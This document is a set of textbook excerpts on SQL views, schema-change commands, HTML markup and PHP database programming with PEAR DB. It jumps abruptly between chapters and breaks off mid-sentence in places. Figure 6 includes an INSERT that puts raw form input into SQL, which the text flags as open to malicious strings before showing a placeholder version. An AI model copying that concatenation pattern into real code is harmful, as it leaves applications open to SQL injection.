Triggers can be used in various applications, such as maintaining database consis-
tency, monitoring database updates, and updating derived data automatically.
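
As a hedged sketch of trigger maintenance (written, like R5, in Oracle syntax), a trigger can later be deactivated or removed by referring to its name:

ALTER TRIGGER SALARY_VIOLATION DISABLE;
DROP TRIGGER SALARY_VIOLATION;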

3 Views (Virtual Tables) in SQL
In this section we introduce the concept of a view in SQL. We show how views are
specified, and then we discuss the problem of updating views and how views can be
implemented by the DBMS.

3.1 Concept of a View in SQL
A view in SQL terminology is a single table that is derived from other tables.6 These
other tables can be base tables or previously defined views. A view does not necessarily
exist in physical form; it is considered to be a virtual table, in contrast to base tables,
whose tuples are always physically stored in the database. This limits the possible
update operations that can be applied to views, but it does not provide any limitations
on querying a view.

6As used in SQL, the term view is more limited than the term user view, since a user view would possibly
include many relations.

Figure 2
Two views specified on the database schema of Figure A.1: WORKS_ON1(Fname, Lname, Pname, Hours) and DEPT_INFO(Dept_name, No_of_emps, Total_sal).

We can think of a view as a way of specifying a table that we need to reference fre-
quently, even though it may not exist physically. For example, referring to the
COMPANY database in Figure A.1 we may frequently issue queries that retrieve the
employee name and the project names that the employee works on. Rather than
having to specify the join of the three tables EMPLOYEE, WORKS_ON, and PROJECT
every time we issue this query, we can define a view that is specified as the result of
these joins. Then we can issue queries on the view, which are specified as single-
table retrievals rather than as retrievals involving two joins on three tables. We call
the EMPLOYEE, WORKS_ON, and PROJECT tables the defining tables of the view.

3.2 Specification of Views in SQL
In SQL, the command to specify a view is CREATE VIEW. The view is given a (vir-
tual) table name (or view name), a list of attribute names, and a query to specify the
contents of the view. If none of the view attributes results from applying functions
or arithmetic operations, we do not have to specify new attribute names for the
view, since they would be the same as the names of the attributes of the defining
tables in the default case. The views in V1 and V2 create virtual tables whose schemas
are illustrated in Figure 2 when applied to the database schema of Figure A.1.

V1: CREATE VIEW WORKS_ON1
    AS SELECT Fname, Lname, Pname, Hours
       FROM EMPLOYEE, PROJECT, WORKS_ON
       WHERE Ssn=Essn AND Pno=Pnumber;

V2: CREATE VIEW DEPT_INFO(Dept_name, No_of_emps, Total_sal)
    AS SELECT Dname, COUNT (*), SUM (Salary)
       FROM DEPARTMENT, EMPLOYEE
       WHERE Dnumber=Dno
       GROUP BY Dname;

In V1, we did not specify any new attribute names for the view WORKS_ON1
(although we could have); in this case, WORKS_ON1 inherits the names of the view
attributes from the defining tables EMPLOYEE, PROJECT, and WORKS_ON. View V2
explicitly specifies new attribute names for the view DEPT_INFO, using a one-to-one
correspondence between the attributes specified in the CREATE VIEW clause and
those specified in the SELECT clause of the query that defines the view.

We can now specify SQL queries on a view—or virtual table—in the same way we
specify queries involving base tables. For example, to retrieve the last name and first
name of all employees who work on the ‘ProductX’ project, we can utilize the
WORKS_ON1 view and specify the query as in QV1:

QV1: SELECT Fname, Lname
FROM WORKS_ON1
WHERE Pname=‘ProductX’;

The same query would require the specification of two joins if specified on the
base relations directly; one of the main advantages of a view is to simplify the spec-
ification of certain queries. Views are also used as a security and authorization
mechanism.

A view is supposed to be always up-to-date; if we modify the tuples in the base tables
on which the view is defined, the view must automatically reflect these changes.
Hence, the view is not realized or materialized at the time of view definition but
rather at the time when we specify a query on the view. It is the responsibility of the
DBMS and not the user to make sure that the view is kept up-to-date. We will discuss
various ways in which the DBMS can keep a view up-to-date in the next subsection.

If we do not need a view any more, we can use the DROP VIEW command to dispose
of it. For example, to get rid of the view V1, we can use the SQL statement in V1A:

V1A: DROP VIEW WORKS_ON1;

3.3 View Implementation, View Update,
and Inline Views

The problem of efficiently implementing a view for querying is complex. Two main
approaches have been suggested. One strategy, called query modification, involves
modifying or transforming the view query (submitted by the user) into a query on
the underlying base tables. For example, the query QV1 would be automatically
modified to the following query by the DBMS:

SELECT Fname, Lname
FROM EMPLOYEE, PROJECT, WORKS_ON
WHERE Ssn=Essn AND Pno=Pnumber AND Pname=‘ProductX’;

The disadvantage of this approach is that it is inefficient for views defined via com-
plex queries that are time-consuming to execute, especially if multiple queries are
going to be applied to the same view within a short period of time. The second
strategy, called view materialization, involves physically creating a temporary view
table when the view is first queried and keeping that table on the assumption that
other queries on the view will follow. In this case, an efficient strategy for automati-
cally updating the view table when the base tables are updated must be developed in
order to keep the view up-to-date. Techniques using the concept of incremental
update have been developed for this purpose, where the DBMS can determine what
new tuples must be inserted, deleted, or modified in a materialized view table when
a database update is applied to one of the defining base tables. The view is generally
kept as a materialized (physically stored) table as long as it is being queried. If the
view is not queried for a certain period of time, the system may then automatically
remove the physical table and recompute it from scratch when future queries refer-
ence the view.

Updating of views is complicated and can be ambiguous. In general, an update on a
view defined on a single table without any aggregate functions can be mapped to an
update on the underlying base table under certain conditions. For a view involving
joins, an update operation may be mapped to update operations on the underlying
base relations in multiple ways. Hence, it is often not possible for the DBMS to
determine which of the updates is intended. To illustrate potential problems with
updating a view defined on multiple tables, consider the WORKS_ON1 view, and
suppose that we issue the command to update the PNAME attribute of ‘John Smith’
from ‘ProductX’ to ‘ProductY’. This view update is shown in UV1:

UV1: UPDATE WORKS_ON1
     SET   Pname = 'ProductY'
     WHERE Lname='Smith' AND Fname='John'
           AND Pname='ProductX';

This query can be mapped into several updates on the base relations to give the
desired update effect on the view. In addition, some of these updates will create
additional side effects that affect the result of other queries. For example, here are
two possible updates, (a) and (b), on the base relations corresponding to the view
update operation in UV1:

(a): UPDATE WORKS_ON
     SET Pno = ( SELECT Pnumber
                 FROM PROJECT
                 WHERE Pname='ProductY' )
     WHERE Essn IN ( SELECT Ssn
                     FROM EMPLOYEE
                     WHERE Lname='Smith' AND Fname='John' )
       AND Pno = ( SELECT Pnumber
                   FROM PROJECT
                   WHERE Pname='ProductX' );

(b): UPDATE PROJECT SET Pname = 'ProductY'
     WHERE Pname = 'ProductX';

Update (a) relates ‘John Smith’ to the ‘ProductY’ PROJECT tuple instead of the
‘ProductX’ PROJECT tuple and is the most likely desired update. However, (b)


would also give the desired update effect on the view, but it accomplishes this by
changing the name of the ‘ProductX’ tuple in the PROJECT relation to ‘ProductY’. It
is quite unlikely that the user who specified the view update UV1 wants the update
to be interpreted as in (b), since it also has the side effect of changing all the view
tuples with Pname = ‘ProductX’.

Some view updates may not make much sense; for example, modifying the Total_sal
attribute of the DEPT_INFO view does not make sense because Total_sal is defined to
be the sum of the individual employee salaries. This request is shown as UV2:

UV2: UPDATE DEPT_INFO
SET Total_sal=100000
WHERE Dname='Research';

A large number of updates on the underlying base relations can satisfy this view
update.
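
For reference, DEPT_INFO is a grouped view defined earlier in the chapter; a sketch along
the following lines (attribute and column names assumed here) shows why the update cannot
be mapped: Total_sal is a computed aggregate rather than a stored column.

CREATE VIEW DEPT_INFO (Dept_name, No_of_emps, Total_sal) AS
SELECT   Dname, COUNT(*), SUM(Salary)        -- Total_sal is derived, not stored
FROM     DEPARTMENT, EMPLOYEE
WHERE    Dnumber=Dno
GROUP BY Dname;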

Generally, a view update is feasible when only one possible update on the base rela-
tions can accomplish the desired update effect on the view. Whenever an update on
the view can be mapped to more than one update on the underlying base relations,
we must have a certain procedure for choosing one of the possible updates as the
most likely one. Some researchers have developed methods for choosing the most
likely update, while other researchers prefer to have the user choose the desired
update mapping during view definition.

In summary, we can make the following observations:

■ A view with a single defining table is updatable if the view attributes contain
the primary key of the base relation, as well as all attributes with the NOT
NULL constraint that do not have default values specified.

■ Views defined on multiple tables using joins are generally not updatable.

■ Views defined using grouping and aggregate functions are not updatable.

In SQL, the clause WITH CHECK OPTION must be added at the end of the view defi-
nition if a view is to be updated. This allows the system to check for view updatabil-
ity and to plan an execution strategy for view updates.
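
As a hedged illustration (the view name DEPT5_EMPS is invented here), a single-table view
declared with this clause rejects any update or insert through the view that would produce
a row no longer visible in the view:

CREATE VIEW DEPT5_EMPS AS
SELECT Ssn, Fname, Lname, Salary, Dno
FROM   EMPLOYEE
WHERE  Dno=5
WITH CHECK OPTION;

-- Rejected: the modified row would violate Dno=5 and drop out of the view.
UPDATE DEPT5_EMPS SET Dno=4 WHERE Ssn='123456789';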

It is also possible to define a view table in the FROM clause of an SQL query. This is
known as an in-line view. In this case, the view is defined within the query itself.
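
A minimal sketch of an in-line view follows: the subquery in the FROM clause (aliased as D,
a name chosen only for this example) acts as a temporary view that exists just for the
duration of the outer query.

SELECT D.Dno, D.Total_sal
FROM   ( SELECT Dno, SUM(Salary) AS Total_sal
         FROM   EMPLOYEE
         GROUP BY Dno ) AS D
WHERE  D.Total_sal > 100000;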

4 Schema Change Statements in SQL
In this section, we give an overview of the schema evolution commands available in
SQL, which can be used to alter a schema by adding or dropping tables, attributes,
constraints, and other schema elements. This can be done while the database is
operational and does not require recompilation of the database schema. Certain
checks must be done by the DBMS to ensure that the changes do not affect the rest
of the database and make it inconsistent.


4.1 The DROP Command
The DROP command can be used to drop named schema elements, such as tables,
domains, or constraints. One can also drop a schema. For example, if a whole
schema is no longer needed, the DROP SCHEMA command can be used. There are
two drop behavior options: CASCADE and RESTRICT. For example, to remove the
COMPANY database schema and all its tables, domains, and other elements, the
CASCADE option is used as follows:

DROP SCHEMA COMPANY CASCADE;

If the RESTRICT option is chosen in place of CASCADE, the schema is dropped only
if it has no elements in it; otherwise, the DROP command will not be executed. To
use the RESTRICT option, the user must first individually drop each element in the
schema, then drop the schema itself.

If a base relation within a schema is no longer needed, the relation and its definition
can be deleted by using the DROP TABLE command. For example, if we no longer
wish to keep track of dependents of employees in the COMPANY database of Figure
A.3, we can get rid of the DEPENDENT relation by issuing the following command:

DROP TABLE DEPENDENT CASCADE;

If the RESTRICT option is chosen instead of CASCADE, a table is dropped only if it
is not referenced in any constraints (for example, by foreign key definitions in
another relation) or views (see Section 3) or by any other elements. With the
CASCADE option, all such constraints, views, and other elements that reference the
table being dropped are also dropped automatically from the schema, along with
the table itself.

Notice that the DROP TABLE command not only deletes all the records in the table if
successful, but also removes the table definition from the catalog. If it is desired to
delete only the records but to leave the table definition for future use, then the
DELETE command should be used instead of DROP TABLE.
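
For example, the following statement (shown only as a contrast to DROP TABLE) removes all
DEPENDENT records but keeps the table definition in the catalog for future insertions:

DELETE FROM DEPENDENT;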

The DROP command can also be used to drop other types of named schema ele-
ments, such as constraints or domains.

4.2 The ALTER Command
The definition of a base table or of other named schema elements can be changed by
using the ALTER command. For base tables, the possible alter table actions include
adding or dropping a column (attribute), changing a column definition, and adding
or dropping table constraints. For example, to add an attribute for keeping track of
jobs of employees to the EMPLOYEE base relation in the COMPANY schema (see
Figure A.3), we can use the command

ALTER TABLE COMPANY.EMPLOYEE ADD COLUMN Job VARCHAR(12);

We must still enter a value for the new attribute Job for each individual EMPLOYEE
tuple. This can be done either by specifying a default clause or by using the UPDATE


command individually on each tuple. If no default clause is specified, the new
attribute will have NULLs in all the tuples of the relation immediately after the com-
mand is executed; hence, the NOT NULL constraint is not allowed in this case.
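
If the new column should be NOT NULL, most systems therefore expect a default to be
supplied in the same statement so that existing tuples can be filled in; a hedged variant
of the command above (the default value 'Unassigned' is invented for illustration):

ALTER TABLE COMPANY.EMPLOYEE
  ADD COLUMN Job VARCHAR(12) DEFAULT 'Unassigned' NOT NULL;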

To drop a column, we must choose either CASCADE or RESTRICT for drop behav-
ior. If CASCADE is chosen, all constraints and views that reference the column are
dropped automatically from the schema, along with the column. If RESTRICT is
chosen, the command is successful only if no views or constraints (or other schema
elements) reference the column. For example, the following command removes the
attribute Address from the EMPLOYEE base table:

ALTER TABLE COMPANY.EMPLOYEE DROP COLUMN Address CASCADE;

It is also possible to alter a column definition by dropping an existing default clause
or by defining a new default clause. The following examples illustrate this clause:

ALTER TABLE COMPANY.DEPARTMENT ALTER COLUMN Mgr_ssn
DROP DEFAULT;

ALTER TABLE COMPANY.DEPARTMENT ALTER COLUMN Mgr_ssn
SET DEFAULT '333445555';

One can also change the constraints specified on a table by adding or dropping a
named constraint. To be dropped, a constraint must have been given a name when
it was specified. For example, to drop the constraint named EMPSUPERFK in Figure
A.4 from the EMPLOYEE relation, we write:

ALTER TABLE COMPANY.EMPLOYEE
DROP CONSTRAINT EMPSUPERFK CASCADE;

Once this is done, we can redefine a replacement constraint by adding a new con-
straint to the relation, if needed. This is specified by using the ADD keyword in the
ALTER TABLE statement followed by the new constraint, which can be named or
unnamed and can be of any of the table constraint types discussed.
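
A hedged example of such a replacement, re-adding a named foreign key on the supervisor
attribute (the referential action chosen here is only illustrative):

ALTER TABLE COMPANY.EMPLOYEE
  ADD CONSTRAINT EMPSUPERFK
      FOREIGN KEY (Super_ssn) REFERENCES COMPANY.EMPLOYEE (Ssn)
      ON DELETE SET NULL;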

The preceding subsections gave an overview of the schema evolution commands of
SQL. It is also possible to create new tables and views within a database schema
using the appropriate commands. There are many other details and options; we
refer the interested reader to the SQL documents listed in the Selected Bibliography
at the end of this chapter.

5 Summary
In this chapter we presented additional features of the SQL database language. We
started in Section 1 by presenting more complex features of SQL retrieval queries,
including nested queries, joined tables, outer joins, aggregate functions, and group-
ing. In Section 2, we described the CREATE ASSERTION statement, which allows the
specification of more general constraints on the database, and introduced the con-
cept of triggers and the CREATE TRIGGER statement. Then, in Section 3, we
described the SQL facility for defining views on the database. Views are also called


Table 2 Summary of SQL Syntax

CREATE TABLE <table name>
    ( <column name> <column type> [ <attribute constraint> ]
      { , <column name> <column type> [ <attribute constraint> ] }
      [ <table constraint> { , <table constraint> } ] )

DROP TABLE <table name>

ALTER TABLE <table name>
    ADD <column name> <column type>

SELECT [ DISTINCT ] <attribute list>
FROM ( <table name> { <alias> } | <joined table> ) { , ( <table name> { <alias> } | <joined table> ) }
[ WHERE <condition> ]
[ GROUP BY <grouping attributes> [ HAVING <group selection condition> ] ]
[ ORDER BY <column name> [ <order> ] { , <column name> [ <order> ] } ]

<attribute list> ::= ( * | ( <column name> | <function> ( ( [ DISTINCT ] <column name> | * ) ) )
                      { , ( <column name> | <function> ( ( [ DISTINCT ] <column name> | * ) ) } ) )

<grouping attributes> ::= <column name> { , <column name> }

<order> ::= ( ASC | DESC )

INSERT INTO <table name>
    [ ( <column name> { , <column name> } ) ]
    ( VALUES ( <constant value> { , <constant value> } ) { , ( <constant value> { , <constant value> } ) }
      | <select statement> )

DELETE FROM <table name>
[ WHERE <selection condition> ]

UPDATE <table name>
SET <column name> = <value expression> { , <column name> = <value expression> }
[ WHERE <selection condition> ]

CREATE [ UNIQUE ] INDEX <index name>
ON <table name>
    ( <column name> [ <order> ] { , <column name> [ <order> ] } )
    [ CLUSTER ]

DROP INDEX <index name>

CREATE VIEW <view name> [ ( <column name> { , <column name> } ) ]
AS <select statement>






(Figure 2, referenced below, is part of an HTML file listing employees and their weekly
hours for each project. The ProductX project: John Smith: 32.5 hours per week; Joyce
English: 20.0 hours per week. The ProductY project: John Smith: 7.5 hours per week;
Joyce English: 20.0 hours per week; Franklin Wong: 10.0 hours per week.)

In addition to structured and semistructured data, a third category exists, known as
unstructured data because there is very limited indication of the type of data. A
typical example is a text document that contains information embedded within it.
Web pages in HTML that contain some data are considered to be unstructured data.
Consider part of an HTML file, shown in Figure 2. Text that appears between angled
brackets, <...>, is an HTML tag. A tag with a slash, </...>, indicates an end tag,
which represents the ending of the effect of a matching start tag. The tags mark up


the document1 in order to instruct an HTML processor how to display the text
between a start tag and a matching end tag. Hence, the tags specify document for-
matting rather than the meaning of the various data elements in the document.
HTML tags specify information, such as font size and style (boldface, italics, and so
on), color, heading levels in documents, and so on. Some tags provide text structur-
ing in documents, such as specifying a numbered or unnumbered list or a table.
Even these structuring tags specify that the embedded textual data is to be displayed
in a certain manner, rather than indicating the type of data represented in the table.

HTML uses a large number of predefined tags, which are used to specify a variety of
commands for formatting Web documents for display. The start and end tags spec-
ify the range of text to be formatted by each command. A few examples of the tags
shown in Figure 2 follow:

■ The <HTML> … </HTML> tags specify the boundaries of the document.

■ The document header information—within the <HEAD> … </HEAD> tags—
specifies various commands that will be used elsewhere in the document. For
example, it may specify various script functions in a language such as
JavaScript or PERL, or certain formatting styles (fonts, paragraph styles,
header styles, and so on) that can be used in the document. It can also specify
a title to indicate what the HTML file is for, and other similar information
that will not be displayed as part of the document.

■ The body of the document—specified within the <BODY> … </BODY>
tags—includes the document text and the markup tags that specify how the
text is to be formatted and displayed. It can also include references to other
objects, such as images, videos, voice messages, and other documents.

■ The <H1> … </H1> tags specify that the text is to be displayed as a level 1
heading. There are many heading levels (<H2>, <H3>, and so on), each
displaying text in a less prominent heading format.

■ The <TABLE> … </TABLE> tags specify that the following text is to be
displayed as a table. Each table row in the table is enclosed within
<TR> … </TR> tags, and the individual table data elements in a row are
displayed within <TD> … </TD> tags.2

■ Some tags may have attributes, which appear within the start tag and
describe additional properties of the tag.3

In Figure 2, the <TABLE> start tag has four attributes describing various characteristics
of the table.

There are two main types of arrays: numeric and associative. We discuss each of
these in the context of single-dimensional arrays next.

A numeric array associates a numeric index (or position or sequence number) with
each element in the array. Indexes are integer numbers that start at zero and grow
incrementally. An element in the array is referenced through its index. An
associative array provides pairs of (key => value) elements. The value of an element
is referenced through its key, and all key values in a particular array must be unique.
The element values can be strings or integers, or they can be arrays themselves, thus
leading to higher dimensional arrays.

Figure 3 gives two examples of array variables: $teaching and $courses. The first
array $teaching is associative (see line 0 in Figure 3), and each element associates a
course name (as key) with the name of the course instructor (as value). There are
three elements in this array. Line 1 shows how the array may be updated. The first
command in line 1 assigns a new instructor to the course ‘Graphics’ by updating its
value. Since the key value ‘Graphics’ already exists in the array, no new element is
created but the existing value is updated. The second command creates a new ele-
ment since the key value ‘Data Mining’ did not exist in the array before. New ele-
ments are added at the end of the array.

If we only provide values (no keys) as array elements, the keys are automatically
numeric and numbered 0, 1, 2, …. This is illustrated in line 5 of Figure 3, by the
$courses array. Both associative and numeric arrays have no size limits. If some
value of another data type, say an integer, is assigned to a PHP variable that was
holding an array, the variable now holds the integer value and the array contents are
lost. Basically, most variables can be assigned to values of any data type at any time.

There are several different techniques for looping through arrays in PHP. We illus-
trate two of these techniques in Figure 3. Lines 3 and 4 show one method of looping
through all the elements in an array using the foreach construct, and printing the


key and value of each element on a separate line. Lines 7 through 10 show how a tra-
ditional for-loop construct can be used. A built-in function count (line 7) returns
the current number of elements in the array, which is assigned to the variable $num
and used to control ending the loop.

The example in lines 7 through 10 also illustrates how an HTML table can be dis-
played with alternating row colors, by setting the two colors in an array
$alt_row_color (line 8). Each time through the loop, the remainder function $i
% 2 switches from one row (index 0) to the next (index 1) (see line 8). The color is
assigned to the HTML bgcolor attribute of the <TR> (table row) tag.

The count function (line 7) returns the current number of elements in the array.
The sort function (line 2) sorts the array based on the element values in it (not the
keys). For associative arrays, each key remains associated with the same element
value after sorting. This does not occur when sorting numeric arrays. There are
many other functions that can be applied to PHP arrays, but a full discussion is out-
side the scope of our presentation.

2.3 PHP Functions
As with other programming languages, functions can be defined in PHP to better
structure a complex program and to share common sections of code that can be
reused by multiple applications. The newer version of PHP, PHP5, also has object-
oriented features, but we will not discuss these here as we are focusing on the basics
of PHP. Basic PHP functions can have arguments that are passed by value. Global
variables can be accessed within functions. Standard scope rules apply to variables
that appear within a function and within the code that calls the function.

We now give two simple examples to illustrate basic PHP functions. In Figure 4, we
show how we could rewrite the code segment P1 from Figure 1(a) using functions.
The code segment P1′ in Figure 4 has two functions: display_welcome() (lines 0
to 3) and display_empty_form() (lines 5 to 13). Neither of these functions has
arguments nor do they have return values. Lines 14 through 19 show how we can
call these functions to produce the same effect as the segment of code P1 in Figure
1(a). As we can see in this example, functions can be used just to make the PHP code
better structured and easier to follow.

A second example is shown in Figure 5. Here we are using the $teaching array
introduced in Figure 3. The function course_instructor() in lines 0 to 8 in
Figure 5 has two arguments: $course (a string holding a course name) and
$teaching_assignments (an associative array holding course assignments, simi-
lar to the $teaching array shown in Figure 3). The function finds the name of the
instructor who teaches a particular course. Lines 9 to 14 in Figure 5 show how this
function may be used.

The function call in line 11 would return the string: Smith is teaching Database,
because the array entry with the key ‘Database’ has the value ‘Smith’ for instructor.
On the other hand, the function call on line 13 would return the string: there is no
Computer Architecture course because there is no entry in the array with the key


Figure 4
Rewriting program segment P1 as P1′ using functions.

//Program Segment P1′:
0) function display_welcome() {
1)    print("Welcome, ");
2)    print($_POST['user_name']);
3) }
4)
5) function display_empty_form() {
6) print <<<_HTML_
7) <FORM method="post" action="$_SERVER[PHP_SELF]">
8) Enter your name: <INPUT type="text" name="user_name">
9) <BR/>
10) <INPUT type="submit" value="SUBMIT NAME">
11) </FORM>
12) _HTML_;
13) }
14) if ($_POST['user_name']) {
15)    display_welcome();
16) }
17) else {
18)    display_empty_form();
19) }

Figure 5
Illustrating a function with arguments and return value.

0) function course_instructor ($course, $teaching_assignments) {
1)    if (array_key_exists($course, $teaching_assignments)) {
2)       $instructor = $teaching_assignments[$course];
3)       RETURN "$instructor is teaching $course";
4)    }
5)    else {
6)       RETURN "there is no $course course";
7)    }
8) }
9) $teaching = array('Database' => 'Smith', 'OS' => 'Carrick', 'Graphics' => 'Kam');
10) $teaching['Graphics'] = 'Benson'; $teaching['Data Mining'] = 'Kam';
11) $x = course_instructor('Database', $teaching);
12) print($x);
13) $x = course_instructor('Computer Architecture', $teaching);
14) print($x);


‘Computer Architecture’. A few comments about this example and about PHP func-
tions in general:

■ The built-in PHP array function array_key_exists($k, $a) returns true
if the value in variable $k exists as a key in the associative array in the variable
$a. In our example, it checks whether the $course value provided exists as a
key in the array $teaching_assignments (line 1 in Figure 5).

■ Function arguments are passed by value. Hence, in this example, the calls in
lines 11 and 13 could not change the array $teaching provided as argument
for the call. The values provided in the arguments are passed (copied) to the
function arguments when the function is called.

■ Return values of a function are placed after the RETURN keyword. A function
can return any type. In this example, it returns a string type. Two different
strings can be returned in our example, depending on whether the $course
key value provided exists in the array or not.

■ Scope rules for variable names apply as in other programming languages.
Global variables outside of the function cannot be used unless they are
referred to using the built-in PHP array $GLOBALS. Basically,
$GLOBALS[‘abc’] will access the value in a global variable $abc defined
outside the function. Otherwise, variables appearing inside a function are
local even if there is a global variable with the same name.

The previous discussion gives a brief overview of PHP functions. Many details are
not discussed since it is not our goal to present PHP in detail.

2.4 PHP Server Variables and Forms
There are a number of built-in entries in a PHP auto-global built-in array variable
called $_SERVER that can provide the programmer with useful information about
the server where the PHP interpreter is running, as well as other information. These
may be needed when constructing the text in an HTML document (for example, see
line 7 in Figure 4). Here are some of these entries:

1. $_SERVER[‘SERVER_NAME’]. This provides the Web site name of the server
computer where the PHP interpreter is running. For example, if the PHP
interpreter is running on the Web site http://www.uta.edu, then this string
would be the value in $_SERVER[‘SERVER_NAME’].

2. $_SERVER[‘REMOTE_ADDRESS’]. This is the IP (Internet Protocol) address
of the client user computer that is accessing the server, for example
129.107.61.8.

3. $_SERVER[‘REMOTE_HOST’]. This is the Web site name of the client user
computer, for example abc.uta.edu. In this case, the server will need to trans-
late the name into an IP address to access the client.

4. $_SERVER[‘PATH_INFO’]. This is the part of the URL address that comes
after a slash (/) at the end of the URL.


5. $_SERVER[‘QUERY_STRING’]. This provides the string that holds parame-
ters in a URL after a question mark (?) at the end of the URL. This can hold
search parameters, for example.

6. $_SERVER[‘DOCUMENT_ROOT’]. This is the root directory that holds the
files on the Web server that are accessible to client users.

These and other entries in the $_SERVER array are usually needed when creating the
HTML file to be sent for display.

Another important PHP auto-global built-in array variable is called $_POST. This
provides the programmer with input values submitted by the user through HTML
forms specified in the HTML <INPUT> tag and other similar tags. For example, in
Figure 4 line 14, the variable $_POST['user_name'] provides the programmer
with the value typed in by the user in the HTML form specified via the <INPUT> tag
on line 8. The keys to this array are the names of the various input parameters pro-
vided via the form, for example by using the name attribute of the HTML <INPUT>
tag as on line 8. When users enter data through forms, the data values can be stored
in this array.

3 Overview of PHP Database Programming
There are various techniques for accessing a database through a programming
language, such as accessing an SQL database from the C and Java programming
languages using embedded SQL, JDBC, SQL/CLI (similar to ODBC), or SQLJ.
In this section we give an overview of how to access the database using the script
language PHP, which is quite suitable for creating Web interfaces for searching and
updating databases, as well as dynamic Web pages.

There is a PHP database access function library that is part of PHP Extension and
Application Repository (PEAR), which is a collection of several libraries of func-
tions for enhancing PHP. The PEAR DB library provides functions for database
access. Many database systems can be accessed from this library, including Oracle,
MySQL, SQLite, and Microsoft SQLServer, among others.

We will discuss several functions that are part of PEAR DB in the context of some
examples. Section 3.1 shows how to connect to a database using PHP. Section 3.2
discusses how data collected from HTML forms can be used to insert a new record
in a database table (relation). Section 3.3 shows how retrieval queries can be exe-
cuted and have their results displayed within a dynamic Web page.

3.1 Connecting to a Database
To use the database functions in a PHP program, the PEAR DB library module
called DB.php must be loaded. In Figure 6, this is done in line 0 of the example. The
DB library functions can now be accessed using DB::. The func-
tion for connecting to a database is called DB::connect(‘string’) where the


Figure 6
Connecting to a database, creating a table, and inserting a record.

0) require 'DB.php';
1) $d = DB::connect('oci8://acct1:pass12@www.host.com/db1');
2) if (DB::isError($d)) { die("cannot connect - " . $d->getMessage()); }

3) $q = $d->query("CREATE TABLE EMPLOYEE
4)     (Emp_id INT,
5)      Name VARCHAR(15),
6)      Job VARCHAR(10),
7)      Dno INT)" );
8) if (DB::isError($q)) { die("table creation not successful - " . $q->getMessage()); }

9) $d->setErrorHandling(PEAR_ERROR_DIE);

10) $eid = $d->nextID('EMPLOYEE');
11) $q = $d->query("INSERT INTO EMPLOYEE VALUES
12)     ($eid, '$_POST[emp_name]', '$_POST[emp_job]', $_POST[emp_dno])" );

13) $eid = $d->nextID('EMPLOYEE');
14) $q = $d->query('INSERT INTO EMPLOYEE VALUES (?, ?, ?, ?)',
15)     array($eid, $_POST['emp_name'], $_POST['emp_job'], $_POST['emp_dno']) );

string argument specifies the database information. The format for 'string' is:

<DBMS software>://<user account>:<password>@<database server>

In Figure 6, line 1 connects to the database that is stored using Oracle (specified via
the string oci8). The <DBMS software> portion of the 'string' specifies the
particular DBMS software package being connected to. Some of the DBMS software
packages that are accessible through PEAR DB are:

■ MySQL. Specified as mysql for earlier versions and mysqli for later versions
starting with version 4.1.2.

■ Oracle. Specified as oci8 for versions 7, 8, and 9. This is used in line 1 of
Figure 6.

■ SQLite. Specified as sqlite.
■ Microsoft SQL Server. Specified as mssql.
■ Mini SQL. Specified as msql.
■ Informix. Specified as ifx.
■ Sybase. Specified as sybase.
■ Any ODBC-compliant system. Specified as odbc.

The above is not a comprehensive list.


Following the <DBMS software> in the string argument passed to DB::connect is
the separator :// followed by the user account name <user account> followed by
the separator : and the account password <password>. These are followed by the
separator @ and the server name and directory <database server> where the
database is stored.

In line 1 of Figure 6, the user is connecting to the server at www.host.com/db1 using
the account name acct1 and password pass12 stored under the Oracle DBMS
oci8. The whole string is passed using DB::connect. The connection information
is kept in the database connection variable $d, which is used whenever an operation
to this particular database is applied.

Line 2 in Figure 6 shows how to check whether the connection to the database was
established successfully or not. PEAR DB has a function DB::isError, which can
determine whether any database access operation was successful or not. The argu-
ment to this function is the database connection variable ($d in this example). In
general, the PHP programmer can check after every database call to determine
whether the last database operation was successful or not, and terminate the pro-
gram (using the die function) if it was not successful. An error message is also
returned from the database via the operation $d->getMessage(). This can also
be displayed as shown in line 2 of Figure 6.

In general, most SQL commands can be sent to the database once a connection is
established via the query function. The function $d->query takes an SQL com-
mand as its string argument and sends it to the database server for execution. In
Figure 6, lines 3 to 7 send a CREATE TABLE command to create a table called
EMPLOYEE with four attributes. Whenever a query is executed, the result of the
query is assigned to a query variable, which is called $q in our example. Line 8
checks whether the query was executed successfully or not.

The PHP PEAR DB library offers an alternative to having to check for errors after
every database command. The function

$d->setErrorHandling(PEAR_ERROR_DIE)

will terminate the program and print the default error messages if any subsequent
errors occur when accessing the database through connection $d (see line 9 in
Figure 6).

3.2 Collecting Data from Forms and Inserting Records
It is common in database applications to collect information through HTML or
other types of Web forms. For example, when purchasing an airline ticket or apply-
ing for a credit card, the user has to enter personal information such as name,
address, and phone number. This information is typically collected and stored in a
database record on a database server.

Lines 10 through 12 in Figure 6 illustrate how this may be done. In this example, we
omitted the code for creating the form and collecting the data, which can be a vari-
ation of the example in Figure 1. We assume that the user entered valid values in the


input parameters called emp_name, emp_job, and emp_dno. These would be acces-
sible via the PHP auto-global array $_POST as discussed at the end of Section 2.4.

In the SQL INSERT command shown on lines 11 and 12 in Figure 6, the array
entries $_POST['emp_name'], $_POST['emp_job'], and $_POST['emp_dno'] will
hold the values collected from the user through the input form of HTML. These are
then inserted as a new employee record in the EMPLOYEE table.

This example also illustrates another feature of PEAR DB. It is common in some
applications to create a unique record identifier for each new record inserted into
the database.1

PHP has a function $d->nextID to create a sequence of unique values for a partic-
ular table. In our example, the field Emp_id of the EMPLOYEE table (see Figure 6, line
4) is created for this purpose. Line 10 shows how to retrieve the next unique value in
the sequence for the EMPLOYEE table and insert it as part of the new record in lines
11 and 12.

The code for insert in lines 10 to 12 in Figure 6 may allow malicious strings to be
entered that can alter the INSERT command. A safer way to do inserts and other
queries is through the use of placeholders (specified by the ? symbol). An example
is illustrated in lines 13 to 15, where another record is to be inserted. In this form of
the $d->query() function, there are two arguments. The first argument is the SQL
statement, with one or more ? symbols (placeholders). The second argument is an
array, whose element values will be used to replace the placeholders in the order
they are specified.

3.3 Retrieval Queries from Database Tables
We now give three examples of retrieval queries through PHP, shown in Figure 7.
The first few lines 0 to 3 establish a database connection $d and set the error han-
dling to the default, as we discussed in the previous section. The first query (lines 4
to 7) retrieves the name and department number of all employee records. The query
variable $q is used to refer to the query result. A while-loop to go over each row in
the result is shown in lines 5 to 7. The function $q->fetchRow() in line 5 serves to
retrieve the next record in the query result and to control the loop. The looping
starts at the first record.

The second query example is shown in lines 8 to 13 and illustrates a dynamic query.
In this query, the conditions for selection of rows are based on values input by the
user. Here we want to retrieve the names of employees who have a specific job and
work for a particular department. The particular job and department number are
entered through a form in the array variables $_POST['emp_job'] and

1This would be similar to system-generated OID for object and object-relational database systems.


Figure 7
